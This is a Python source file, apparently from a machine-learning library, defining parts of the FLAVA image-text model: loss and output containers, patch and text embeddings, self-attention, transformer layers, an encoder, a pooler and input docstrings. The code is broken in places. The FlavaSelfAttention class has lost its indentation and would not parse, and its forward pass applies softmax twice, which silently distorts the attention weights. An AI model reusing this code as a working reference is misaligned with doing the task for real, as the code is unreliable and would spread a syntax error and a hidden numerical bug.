class FlavaLosses(ModelOutput):
    """Class representing pretraining losses from FLAVA model
    Args:
        mim (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mim_labels` and `pixel_values` are present, `input_ids_masked` is absent and `mim_weight` > 0.:
            Masked Image Modeling loss as used in BeIT calculated only for unimodal image data.
        mlm (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mlm_labels` and `input_ids_masked` are present, `pixel_values` is absent and `mlm_weight` > 0.:
            Masked Language Modeling loss as used in BERT calculated only for unimodal text data.
        itm (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `itm_labels`, `input_ids_masked`, `pixel_values` are present and `itm_weight` > 0.:
            Image Text Matching (ITM) loss calculated for paired image-text data. Note that ITM loss is calculated on
            masked pairs in FLAVA.
        global_contrastive (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `input_ids` and `pixel_values` are present and `global_contrastive_weight` > 0.:
            Contrastive loss for image-text similarity similar to CLIP but calculated globally for paired image-text
            data. This is calculated on unmasked images and texts.
        mmm_image (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mim_labels`, `pixel_values` and `input_ids_masked` are present and `mmm_image_weight` > 0.:
            Masked Multimodal Modeling loss's image component calculated on paired image-text data.
        mmm_text (`torch.FloatTensor` of shape `(1,)`, *optional*, returned when `mlm_labels`, `pixel_values` and `input_ids_masked` are present and `mmm_text_weight` > 0.:
            Masked Multimodal Modeling loss's text component calculated on paired image-text data.
    """
    mim: Optional[torch.FloatTensor] = None
    mlm: Optional[torch.FloatTensor] = None
    itm: Optional[torch.FloatTensor] = None
    global_contrastive: Optional[torch.FloatTensor] = None
    mmm_image: Optional[torch.FloatTensor] = None
    mmm_text: Optional[torch.FloatTensor] = None

    def all_none(self) -> bool:
        """Return True when no loss component was computed at all."""
        return all(value is None for value in self.values())
@dataclass
class FlavaForPreTrainingOutput(ModelOutput):
    """
    Output from FlavaForPreTraining containing embeddings, and outputs from individual encoders.

    Note that `image_embeddings` and `text_embeddings` returned are similar to pooled output returned from a
    transformer. If you want embeddings for contrastive loss or retrieval use a FLAVA model's `image_projection` and
    `text_projection` layers on `image_embeddings` and `text_embeddings` respectively.

    Args:
        loss (`torch.FloatTensor`, *optional*, returned when `return_loss` is True):
            Total loss calculated for this model.
        loss_info (`FlavaLosses`):
            Detailed info for FLAVA Pretraining losses. Check `FlavaLosses` class description for the information on
            the keys.
        image_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `pixel_values` are present):
            The image embeddings which are basically the pooled output of [`FlavaImageModel`].
        image_output (`BaseModelOutputWithPooling`, *optional*, returned when `pixel_values` are present):
            The output of the [`FlavaImageModel`].
        text_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` are present):
            The text embeddings which are basically the pooled output of [`FlavaTextModel`].
        text_output (`BaseModelOutputWithPooling`, *optional*, returned when `input_ids` are present):
            The output of the [`FlavaTextModel`].
        multimodal_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` and `pixel_values` are present and `skip_unmasked_multimodal_encoder` is `None` or `False`):
            The multimodal embeddings which are basically the pooled output of [`FlavaTextModel`].
        multimodal_output (`BaseModelOutputWithPooling`, returned when `input_ids` and `pixel_values` are present and `skip_unmasked_multimodal_encoder` is `None` or `False`):
            The output of the [`FlavaMultimodalModel`].
        image_masked_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `pixel_values` are present):
            The image embeddings which are basically the pooled output of [`FlavaImageModel`]. Uses `bool_masked_pos`
            to create masked images.
        image_masked_output (`BaseModelOutputWithPooling`, *optional*, returned when `pixel_values` are present):
            The output of the [`FlavaImageModel`]. Uses `bool_masked_pos` to create masked images.
        text_masked_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids_masked` are present):
            The text embeddings which are basically the pooled output of [`FlavaTextModel`].
        text_masked_output (`BaseModelOutputWithPooling`, *optional*, returned when `input_ids_masked` are present):
            The output of the [`FlavaTextModel`].
        multimodal_masked_embeddings (`torch.FloatTensor` of shape `(batch_size, output_dim)`, *optional*, returned when `input_ids` and `pixel_values` are present):
            The multimodal embeddings which are basically the pooled output of [`FlavaTextModel`].
        multimodal_masked_output (`BaseModelOutputWithPooling`, returned when `input_ids_masked` and `pixel_values` are present):
            The output of the [`FlavaMultimodalModel`].
        mim_logits (`torch.FloatTensor` of shape `(batch_size, num_image_patches, image_vocab_size)` or of shape `(total_masked_patches, image_vocab_size)`, *optional*, returned when `pixel_values` are present and `input_ids_masked` are not):
            The logits for MIM unimodal loss. Uses `bool_masked_pos` to get masked patches. The flattened output is
            returned when `bool_masked_pos` has some of the patches masked.
        mlm_logits (`torch.FloatTensor` of shape `(batch_size, text_seq_length, text_vocab_size)` or of shape `(total_masked_seq_length, text_vocab_size)`, *optional*, returned when `input_ids_masked` are present and `pixel_values` are not):
            The logits for MLM unimodal loss. The flattened output is returned when `input_ids_masked` has some of
            the tokens masked.
        itm_logits (`torch.FloatTensor` of shape `(batch_size, 2)`, *optional*, returned when `input_ids_masked` and `pixel_values` are present):
            The logits for ITM loss. Note that ITM loss is calculated on masked pairs in FLAVA.
        mmm_image_logits (`torch.FloatTensor` of shape `(batch_size, num_image_patches, image_vocab_size)` or of shape `(total_masked_patches, image_vocab_size)`, *optional*, returned when `pixel_values` and `input_ids_masked` are present):
            The logits for MMM image multimodal loss. Uses `bool_masked_pos` to get masked patches. The flattened
            output is returned when `bool_masked_pos` has some of the patches masked.
        mmm_text_logits (`torch.FloatTensor` of shape `(batch_size, text_seq_length, text_vocab_size)` or of shape `(total_masked_seq_length, text_vocab_size)`, *optional*, returned when `pixel_values` and `input_ids_masked` are present):
            The logits for MMM text multimodal loss. The flattened output is returned when `input_ids_masked` has
            some of the tokens masked.
        contrastive_logits_per_image (`torch.FloatTensor` of shape `(image_batch_size, text_batch_size)`):
            The scaled dot product scores between `image_embeddings` and `text_embeddings` but passed through FLAVA's
            `image_projection` and `text_projection` layers respectively. This represents the image-text similarity
            scores. This is calculated on unmasked images and texts.
        contrastive_logits_per_text (`torch.FloatTensor` of shape `(text_batch_size, image_batch_size)`):
            The scaled dot product scores between `text_embeddings` and `image_embeddings` but passed through FLAVA's
            `text_projection` and `image_projection` layers respectively. This is calculated on unmasked images and
            texts.
    """

    loss: Optional[torch.FloatTensor] = None
    loss_info: Optional[FlavaLosses] = None
    image_embeddings: Optional[torch.FloatTensor] = None
    image_output: Optional[BaseModelOutputWithPooling] = None
    text_embeddings: Optional[torch.FloatTensor] = None
    text_output: Optional[BaseModelOutputWithPooling] = None
    multimodal_embeddings: Optional[torch.FloatTensor] = None
    multimodal_output: Optional[BaseModelOutputWithPooling] = None
    image_masked_embeddings: Optional[torch.FloatTensor] = None
    image_masked_output: Optional[BaseModelOutputWithPooling] = None
    text_masked_embeddings: Optional[torch.FloatTensor] = None
    text_masked_output: Optional[BaseModelOutputWithPooling] = None
    multimodal_masked_embeddings: Optional[torch.FloatTensor] = None
    multimodal_masked_output: Optional[BaseModelOutputWithPooling] = None
    mim_logits: Optional[torch.FloatTensor] = None
    mlm_logits: Optional[torch.FloatTensor] = None
    itm_logits: Optional[torch.FloatTensor] = None
    contrastive_logits_per_image: Optional[torch.FloatTensor] = None
    contrastive_logits_per_text: Optional[torch.FloatTensor] = None
    mmm_image_logits: Optional[torch.FloatTensor] = None
    mmm_text_logits: Optional[torch.FloatTensor] = None

    def to_tuple(self) -> Tuple[Any]:
        # Nested transformer outputs are themselves ModelOutputs; recurse into
        # them so the returned tuple contains only plain tensors/tuples.
        transformer_outputs = [
            "text_output",
            "image_output",
            "multimodal_output",
            "text_masked_output",
            "image_masked_output",
            "multimodal_masked_output",
        ]
        return tuple(self[k] if k not in transformer_outputs else getattr(self, k).to_tuple() for k in self.keys())
# Based on timm implementation, which can be found here:
# https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/vision_transformer.py
class FlavaImageEmbeddings(nn.Module):
    """
    Construct the CLS token, position and patch embeddings. Optionally, also the mask token.
    """

    def __init__(self, config: FlavaImageConfig, use_mask_token: bool = False) -> None:
        super().__init__()
        # Keep a mask token either when the caller requests one or when the
        # config itself enables it.
        use_mask_token = use_mask_token or config.mask_token
        self.cls_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size))
        self.mask_token = nn.Parameter(torch.zeros(1, 1, config.hidden_size)) if use_mask_token else None
        self.patch_embeddings = PatchEmbeddings(
            image_size=config.image_size,
            patch_size=config.patch_size,
            num_channels=config.num_channels,
            embed_dim=config.hidden_size,
        )
        num_patches = self.patch_embeddings.num_patches
        # One extra position for the [CLS] token prepended in forward().
        self.position_embeddings = nn.Parameter(torch.zeros(1, num_patches + 1, config.hidden_size))
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.config = config

    def interpolate_pos_encoding(self, embeddings: torch.Tensor, height: int, width: int) -> torch.Tensor:
        """
        This method allows to interpolate the pre-trained position encodings, to be able to use the model on higher
        resolution images.

        Source:
        https://github.com/facebookresearch/dino/blob/de9ee3df6cf39fac952ab558447af1fa1365362a/vision_transformer.py#L174
        """
        npatch = embeddings.shape[1] - 1  # patch tokens in the input (excludes [CLS])
        num_pos = self.position_embeddings.shape[1] - 1  # trained positions (excludes [CLS])
        # Fast path: same number of patches and a square image means the trained
        # encodings can be used unchanged.
        if npatch == num_pos and height == width:
            return self.position_embeddings
        class_pos_embed = self.position_embeddings[:, 0]
        patch_pos_embed = self.position_embeddings[:, 1:]
        dim = embeddings.shape[-1]
        num_h_patches = height // self.config.patch_size
        num_w_patches = width // self.config.patch_size
        # we add a small number to avoid floating point error in the interpolation
        # see discussion at https://github.com/facebookresearch/dino/issues/8
        num_h_patches, num_w_patches = num_h_patches + 0.1, num_w_patches + 0.1
        # Reshape the trained positions into their (assumed square) 2D grid and
        # resize bicubically to the new patch grid.
        patch_pos_embed = nn.functional.interpolate(
            patch_pos_embed.reshape(1, int(math.sqrt(num_pos)), int(math.sqrt(num_pos)), dim).permute(0, 3, 1, 2),
            scale_factor=(num_h_patches / math.sqrt(num_pos), num_w_patches / math.sqrt(num_pos)),
            mode="bicubic",
            align_corners=False,
        )
        if int(num_h_patches) != patch_pos_embed.shape[-2] or int(num_w_patches) != patch_pos_embed.shape[-1]:
            raise ValueError(
                f"Number of patches for images ({int(num_h_patches), int(num_w_patches)}) don't match the "
                f"shape of position embedding ({patch_pos_embed.shape[-2], patch_pos_embed.shape[-1]})"
            )
        # Back to sequence layout and re-attach the [CLS] position at the front.
        patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1).view(1, -1, dim)
        return torch.cat((class_pos_embed.unsqueeze(0), patch_pos_embed), dim=1)

    def forward(
        self,
        pixel_values: torch.Tensor,
        bool_masked_pos: Optional[torch.BoolTensor] = None,
        interpolate_pos_encoding: bool = False,
    ) -> torch.Tensor:
        batch_size, num_channels, height, width = pixel_values.shape
        embeddings = self.patch_embeddings(pixel_values, interpolate_pos_encoding=interpolate_pos_encoding)
        batch_size, seq_len, _ = embeddings.size()
        if bool_masked_pos is not None:
            mask_tokens = self.mask_token.expand(batch_size, seq_len, -1)
            # B X H X W = B X HW
            if bool_masked_pos.dim() == 3:
                bool_masked_pos = bool_masked_pos.view(bool_masked_pos.size(0), -1)
            # replace the masked visual tokens by mask_tokens
            mask = bool_masked_pos.unsqueeze(-1).type_as(mask_tokens)
            embeddings = embeddings * (1.0 - mask) + mask_tokens * mask
        # add the [CLS] token to the embedded patch tokens
        cls_tokens = self.cls_token.expand(batch_size, -1, -1)
        embeddings = torch.cat((cls_tokens, embeddings), dim=1)
        # add positional encoding to each token
        if interpolate_pos_encoding:
            embeddings = embeddings + self.interpolate_pos_encoding(embeddings, height, width)
        else:
            embeddings = embeddings + self.position_embeddings
        embeddings = self.dropout(embeddings)
        return embeddings
# Based on timm implementation, which can be found here:
# https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/vision_transformer.py
class PatchEmbeddings(nn.Module):
    """
    Turn an image into a sequence of patch embeddings using a strided Conv2d:
    each kernel application yields the embedding of one non-overlapping patch.
    """

    def __init__(
        self,
        image_size: int = 224,
        patch_size: Union[int, Tuple[int, int]] = 16,
        num_channels: int = 3,
        embed_dim: int = 768,
    ):
        super().__init__()
        # Normalize scalar sizes to (height, width) pairs.
        if not isinstance(image_size, collections.abc.Iterable):
            image_size = (image_size, image_size)
        if not isinstance(patch_size, collections.abc.Iterable):
            patch_size = (patch_size, patch_size)
        self.image_size = image_size
        self.patch_size = patch_size
        self.num_patches = (image_size[1] // patch_size[1]) * (image_size[0] // patch_size[0])
        self.projection = nn.Conv2d(num_channels, embed_dim, kernel_size=patch_size, stride=patch_size)

    def forward(self, pixel_values: torch.Tensor, interpolate_pos_encoding: bool = False) -> torch.Tensor:
        _, _, height, width = pixel_values.shape
        # The fixed-size check is skipped when the caller will interpolate the
        # position encodings for a different resolution.
        if not interpolate_pos_encoding and (height != self.image_size[0] or width != self.image_size[1]):
            raise ValueError(
                f"Input image size ({height}*{width}) doesn't match model"
                f" ({self.image_size[0]}*{self.image_size[1]})."
            )
        # (B, C, H, W) -> (B, D, H/ph, W/pw) -> (B, num_patches, D)
        return self.projection(pixel_values).flatten(2).transpose(1, 2)
class FlavaTextEmbeddings(nn.Module):
    """Sum word, position and token-type embeddings, then apply layernorm and dropout."""

    def __init__(self, config):
        super().__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
        # any TensorFlow checkpoint file
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        self.position_embedding_type = getattr(config, "position_embedding_type", "absolute")
        # position_ids (1, len position emb) is contiguous in memory and exported when serialized
        self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
        self.register_buffer(
            "token_type_ids", torch.zeros(self.position_ids.size(), dtype=torch.long), persistent=False
        )

    def forward(
        self,
        input_ids: Optional[torch.Tensor] = None,
        token_type_ids: Optional[torch.Tensor] = None,
        position_ids: Optional[torch.Tensor] = None,
    ):
        input_shape = input_ids.size()
        seq_length = input_shape[1]

        if position_ids is None:
            position_ids = self.position_ids[:, :seq_length]

        if token_type_ids is None:
            # Default to the all-zero registered buffer when available; this keeps
            # tracing working without an explicit token_type_ids (issue #5664).
            if hasattr(self, "token_type_ids"):
                token_type_ids = self.token_type_ids[:, :seq_length].expand(input_shape[0], seq_length)
            else:
                token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)

        embeddings = self.word_embeddings(input_ids) + self.token_type_embeddings(token_type_ids)
        if self.position_embedding_type == "absolute":
            embeddings = embeddings + self.position_embeddings(position_ids)
        return self.dropout(self.LayerNorm(embeddings))
class FlavaSelfAttention(nn.Module):
def __init__(self, config: FlavaPossibleConfigs) -> None:
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
f"The hidden size {config.hidden_size,} is not a multiple of the number of attention "
f"heads {config.num_attention_heads}."
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.key = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.value = nn.Linear(config.hidden_size, self.all_head_size, bias=config.qkv_bias)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def transpose_for_scores(self, x: torch.Tensor) -> torch.Tensor:
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states: torch.Tensor,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
output_attentions: bool = False,
) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
mixed_query_layer = self.query(hidden_states)
key_layer = self.transpose_for_scores(self.key(hidden_states))
value_layer = self.transpose_for_scores(self.value(hidden_states))
query_layer = self.transpose_for_scores(mixed_query_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# Normalize the attention scores to probabilities.
attention_probs = nn.functional.softmax(attention_scores, dim=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
class FlavaSelfOutput(nn.Module):
    """
    Output projection for the self-attention context: dense + dropout only.

    The residual connection is defined in FlavaLayer (same as ViTLayer) instead of here (as is the case with other
    models), due to the layernorm applied before each block.
    """

    def __init__(self, config: "FlavaPossibleConfigs") -> None:
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        # `input_tensor` is accepted for interface parity with BERT-style
        # self-outputs but is intentionally unused here (no residual add).
        projected = self.dense(hidden_states)
        return self.dropout(projected)
class FlavaAttention(nn.Module):
    """Self-attention block (FlavaSelfAttention + output projection) with head pruning."""

    def __init__(self, config: "FlavaPossibleConfigs") -> None:
        super().__init__()
        self.attention = FlavaSelfAttention(config)
        self.output = FlavaSelfOutput(config)
        self.pruned_heads = set()

    def prune_heads(self, heads: Set[int]) -> None:
        """Remove the given attention heads from the q/k/v and output projections."""
        if not heads:
            return
        heads, index = find_pruneable_heads_and_indices(
            heads, self.attention.num_attention_heads, self.attention.attention_head_size, self.pruned_heads
        )
        # Shrink the three input projections along their output dim and the
        # output projection along its input dim.
        for proj_name in ("query", "key", "value"):
            setattr(self.attention, proj_name, prune_linear_layer(getattr(self.attention, proj_name), index))
        self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
        # Book-keeping: fewer heads, smaller combined size, remember what was pruned.
        self.attention.num_attention_heads = self.attention.num_attention_heads - len(heads)
        self.attention.all_head_size = self.attention.attention_head_size * self.attention.num_attention_heads
        self.pruned_heads = self.pruned_heads.union(heads)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
    ) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
        self_outputs = self.attention(
            hidden_states, attention_mask=attention_mask, head_mask=head_mask, output_attentions=output_attentions
        )
        attention_output = self.output(self_outputs[0], hidden_states)
        # Prepend the projected context; keep attention probs if they were requested.
        return (attention_output,) + self_outputs[1:]
class FlavaIntermediate(nn.Module):
    """Feed-forward expansion: hidden_size -> intermediate_size followed by the activation."""

    def __init__(self, config: "FlavaPossibleConfigs") -> None:
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
        # A string activation name is resolved through ACT2FN; callables pass through.
        self.intermediate_act_fn = (
            ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        )

    def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
        return self.intermediate_act_fn(self.dense(hidden_states))
class FlavaOutput(nn.Module):
    """Feed-forward contraction back to hidden_size, dropout, then residual add."""

    def __init__(self, config: "FlavaPossibleConfigs") -> None:
        super().__init__()
        self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)

    def forward(self, hidden_states: torch.Tensor, input_tensor: torch.Tensor) -> torch.Tensor:
        projected = self.dropout(self.dense(hidden_states))
        # Second residual connection of the transformer block happens here.
        return projected + input_tensor
class FlavaLayer(nn.Module):
    """
    Pre-norm transformer block (the `Block` class in the timm implementation):
    layernorm -> attention -> residual, then layernorm -> MLP -> residual.
    """

    def __init__(self, config: "FlavaPossibleConfigs") -> None:
        super().__init__()
        self.chunk_size_feed_forward = config.chunk_size_feed_forward
        self.seq_len_dim = 1
        self.attention = FlavaAttention(config)
        self.intermediate = FlavaIntermediate(config)
        self.output = FlavaOutput(config)
        # TODO: Check fp32 layer norm possiblity
        self.layernorm_before = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.layernorm_after = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
    ) -> Union[Tuple[torch.Tensor, torch.Tensor], Tuple[torch.Tensor]]:
        # Pre-norm: layernorm runs before self-attention (as in ViT).
        attn_outputs = self.attention(
            self.layernorm_before(hidden_states),
            attention_mask=attention_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
        )
        # First residual connection.
        residual = attn_outputs[0] + hidden_states
        # MLP sub-block is also pre-normed; FlavaOutput adds the second residual.
        layer_output = self.output(self.intermediate(self.layernorm_after(residual)), residual)
        # Append self-attention probs if they were requested.
        return (layer_output,) + attn_outputs[1:]
class FlavaEncoder(nn.Module):
    """
    Stack of `num_hidden_layers` FlavaLayer blocks with optional gradient
    checkpointing and collection of per-layer hidden states / attentions.
    """

    def __init__(self, config: "FlavaConfig") -> None:
        super().__init__()
        self.config = config
        self.layer = nn.ModuleList([FlavaLayer(config) for _ in range(config.num_hidden_layers)])
        self.gradient_checkpointing = False

    def forward(
        self,
        hidden_states: torch.Tensor,
        attention_mask: Optional[torch.Tensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        output_attentions: bool = False,
        output_hidden_states: bool = False,
        return_dict: bool = True,
    ) -> Union[tuple, "BaseModelOutput"]:
        all_hidden_states = () if output_hidden_states else None
        all_self_attentions = () if output_attentions else None

        for i, layer_module in enumerate(self.layer):
            if output_hidden_states:
                # Record the state *entering* each layer; the final state is added after the loop.
                all_hidden_states = all_hidden_states + (hidden_states,)
            layer_head_mask = None if head_mask is None else head_mask[i]

            if self.gradient_checkpointing and self.training:
                # Recompute the layer during backward instead of storing activations.
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        return module(*inputs, output_attentions)

                    return custom_forward

                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(layer_module),
                    hidden_states,
                    attention_mask,
                    layer_head_mask,
                )
            else:
                layer_outputs = layer_module(hidden_states, attention_mask, layer_head_mask, output_attentions)

            hidden_states = layer_outputs[0]
            if output_attentions:
                all_self_attentions = all_self_attentions + (layer_outputs[1],)

        if output_hidden_states:
            all_hidden_states = all_hidden_states + (hidden_states,)

        if not return_dict:
            return tuple(v for v in (hidden_states, all_hidden_states, all_self_attentions) if v is not None)
        return BaseModelOutput(
            last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_self_attentions
        )
class FlavaPooler(nn.Module):
    """Pool a sequence by passing its first ([CLS]) token through dense + tanh."""

    def __init__(self, config: "FlavaPossibleConfigs"):
        super().__init__()
        self.dense = nn.Linear(config.hidden_size, config.hidden_size)
        self.activation = nn.Tanh()

    def forward(self, hidden_states: torch.Tensor):
        # "Pooling" here is simply reading the hidden state of the first token.
        cls_state = hidden_states[:, 0]
        return self.activation(self.dense(cls_state))
FLAVA_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`{config}`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
FLAVA_INPUTS_DOCSTRING_COMMON = r"""
attention_mask (`torch.FloatTensor` of shape `({0})`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
head_mask (`torch.FloatTensor` of shape `(num_heads,)` or `(num_layers, num_heads)`, *optional*):
Mask to nullify selected heads of the self-attention modules. Mask values selected in `[0, 1]`:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
FLAVA_IMAGE_INPUTS_DOCSTRING_BASE = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`FlavaImageProcessor.__call__`] for details.
bool_masked_pos (`torch.BoolTensor` of shape `(batch_size, image_num_patches)`):
Boolean masked positions. Indicates which patches are masked (1) and which aren't (0).
interpolate_pos_encoding (`bool`, *optional*):
Whether to interpolate the pre-trained position encodings.
"""
FLAVA_IMAGE_INPUTS_DOCSTRING = FLAVA_IMAGE_INPUTS_DOCSTRING_BASE + FLAVA_INPUTS_DOCSTRING_COMMON
FLAVA_TEXT_INPUTS_DOCSTRING_BASE = r"""
Args:
input_ids (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary. Indices can be obtained using [`AutoTokenizer`]. See
[`PreTrainedTokenizer.encode`] and [`PreTrainedTokenizer.__call__`] for details. [What are input
IDs?](../glossary#input-ids)
token_type_ids (`torch.LongTensor` of shape `({0})`, *optional*):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in `[0,
1]`:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
[What are token type IDs?](../glossary#token-type-ids)
"""
FLAVA_TEXT_INPUTS_DOCSTRING = FLAVA_TEXT_INPUTS_DOCSTRING_BASE + FLAVA_INPUTS_DOCSTRING_COMMON
FLAVA_MULTIMODAL_INPUTS_DOCSTRING = (
r"""
Args:
hidden_states (`torch.FloatTensor` of shape `(batch_size, image_num_patches + text_seq_len, hidden_size)`):
The concatenated hidden states of unimodal encoders.
"""
+ FLAVA_INPUTS_DOCSTRING_COMMON
)
FLAVA_MODEL_INPUTS_DOCSTRING_BASE = r"""
Args:
skip_multimodal_encoder (*bool*, *optional*):
Skip any calculations for multimodal encoder. Useful if multimodal encoding is not going to be used.
"""
FLAVA_MODEL_INPUTS_DOCSTRING = (
FLAVA_IMAGE_INPUTS_DOCSTRING_BASE
+ FLAVA_TEXT_INPUTS_DOCSTRING_BASE
+ FLAVA_INPUTS_DOCSTRING_COMMON
+ FLAVA_MODEL_INPUTS_DOCSTRING_BASE
)
FLAVA_PRETRAINING_INPUTS_DOCSTRING = (
r"""
Args:
input_ids_masked (`torch.LongTensor` of shape `({0})`):
Indices of input sequence tokens in the vocabulary. These ones are the masked version of the original task
to be used with MLM. Indices can be obtained using [`AutoTokenizer`] along with
[`DataCollatorForMaskedLanguageModeling`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details. [What are input IDs?](../glossary#input-ids)
"""
+ FLAVA_TEXT_INPUTS_DOCSTRING_BASE
+ FLAVA_IMAGE_INPUTS_DOCSTRING_BASE
+ r"""
image_attention_mask (`torch.FloatTensor` of shape `({1})`, *optional*):
Mask to avoid performing attention on padding token indices specifically for images. Mask values selected
in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
skip_unmasked_multimodal_encoder (*bool*, *optional*):
Skip any calculations for multimodal encoder for unmasked inputs. FLAVA pretraining doesn't need unmasked
multimodal embeddings or outputs as of now.
mlm_labels (`torch.LongTensor` of shape `(batch_size, text_seq_len)`, *optional*):
Labels for computing the left-to-right language and multimodal masked modeling loss (next word prediction).
Indices should be in `[-100, 0, ..., text_config.vocab_size - 1]` (see `input_ids` docstring). Tokens with
indices set to `-100` are ignored (masked), the loss is only computed for the tokens with labels in `[0,
..., text_config.vocab_size - 1]`.
mim_labels (`torch.LongTensor` of shape `(batch_size, image_num_patches)`, *optional*):
Labels for computing the image and multimodal masked modeling loss. Indices should be in `[-100, 0, ...,
image_config.vocab_size - 1]`. Tokens with indices set to `-100` are ignored (masked), the loss is only
computed for the tokens with labels in `[0, ..., image_config.vocab_size - 1]`. If not passed, they are
generated automatically using the image codebook assigned to the model. By default, it uses
[`FlavaImageCodebook`]. See [`FlavaImageCodebook`] to understand how to generate mim_labels.
itm_labels (`torch.LongTensor` of shape `(batch_size, 1)`, *optional*):
Labels for computing the image-text matching loss. 0 means the pairs don't match and 1 means they match.
The pairs with 0 will be skipped for calculation of MMM and global contrastive losses as well.
return_loss (`bool`, *optional*, default to None):
Whether to return calculated loss or not.
"""
+ FLAVA_INPUTS_DOCSTRING_COMMON
)
